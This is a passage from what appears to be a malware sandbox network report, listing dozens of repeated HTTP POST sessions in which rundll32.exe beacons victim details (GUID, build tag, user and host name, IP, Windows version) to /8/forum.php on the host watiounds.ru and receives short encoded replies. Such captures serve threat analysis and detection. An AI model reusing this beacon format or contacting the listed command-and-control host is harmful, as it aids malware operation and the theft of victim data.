                                          Data Ascii: cCTGXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          123192.168.2.224928895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:19.766874075 CEST173OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:19.889653921 CEST173INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:19 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 42 59 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYBYBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          124192.168.2.224928995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:20.200561047 CEST174OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:20.324296951 CEST174INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 48 4a 51 53 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cHJQSARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          125192.168.2.224929095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:20.634546041 CEST175OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:20.757410049 CEST175INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:20 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVZAEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          126192.168.2.224929195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:21.067374945 CEST176OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:21.189064026 CEST176INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZZAAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          127192.168.2.224929295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:21.518301010 CEST177OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:21.648972988 CEST177INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:21 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 48 53 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTHSGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          128192.168.2.224929395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:21.966917038 CEST178OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:22.090084076 CEST179INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 46 41 5a 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cFAZUARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          129192.168.2.224929495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:22.411878109 CEST179OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:22.556219101 CEST180INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 43 4e 4d 58 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cCNMXARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          13192.168.2.224917895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:19:32.044964075 CEST37OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:19:32.173738003 CEST37INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:19:32 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 43 58 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNCXMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          130192.168.2.224929595.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:22.872348070 CEST180OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:22.997508049 CEST181INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:22 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 56 5a 41 45 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cVZAEARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          131192.168.2.224929695.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:23.337340117 CEST182OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:23.465610981 CEST182INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 4a 51 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZJQAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          132192.168.2.224929795.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:23.790137053 CEST183OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:23.913871050 CEST183INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:23 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 4e 4d 4e 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cNMNMARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          133192.168.2.224929895.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:24.228878975 CEST184OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:24.354186058 CEST184INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:24 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 5a 41 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQZAJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          134192.168.2.224929995.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:24.673321009 CEST185OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:24.797720909 CEST185INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:24 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 54 43 58 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cTCXGARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          135192.168.2.224930095.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:25.116193056 CEST186OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:25.238400936 CEST186INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:25 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 56 45 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQVEJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          136192.168.2.224930195.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:25.561485052 CEST187OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:25.692095995 CEST188INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:25 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 5a 56 45 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cZVEAARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          137192.168.2.224930295.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:26.013267040 CEST188OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:26.146719933 CEST189INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:26 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 51 47 54 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cQGTJARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          138192.168.2.224930395.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:26.465742111 CEST189OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                          Data Ascii: GUID=6700602980032050412&BUILD=2604_gthewq&INFO=928100 @ user-PC\user&EXT=&IP=84.17.52.3&TYPE=1&WIN=6.1(x64)
                                          Apr 29, 2021 08:22:26.588289976 CEST190INHTTP/1.1 200 OK
                                          Server: nginx/1.16.1
                                          Date: Thu, 29 Apr 2021 06:22:26 GMT
                                          Content-Type: text/html
                                          Transfer-Encoding: chunked
                                          Connection: keep-alive
                                          X-Powered-By: PHP/5.4.45
                                          Data Raw: 63 0d 0a 59 54 47 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                          Data Ascii: cYTGBARRABw==0


                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                          139192.168.2.224930495.47.161.16280C:\Windows\SysWOW64\rundll32.exe
                                          TimestampkBytes transferredDirectionData
                                          Apr 29, 2021 08:22:26.914062977 CEST191OUTPOST /8/forum.php HTTP/1.1
                                          Accept: */*
                                          Content-Type: application/x-www-form-urlencoded
                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                          Host: watiounds.ru
                                          Content-Length: 110
                                          Cache-Control: no-cache
                                          Data Raw: 47 55 49 44 3d 36 37 30 30 36 30 32 39 38 30 30 33 32 30 35 30 34 31 32 26 42 55 49 4c 44 3d 32 36 30 34 5f 67 74 68 65 77 71 26 49 4e 46 4f 3d 39 32 38 31 30 30 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 33 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
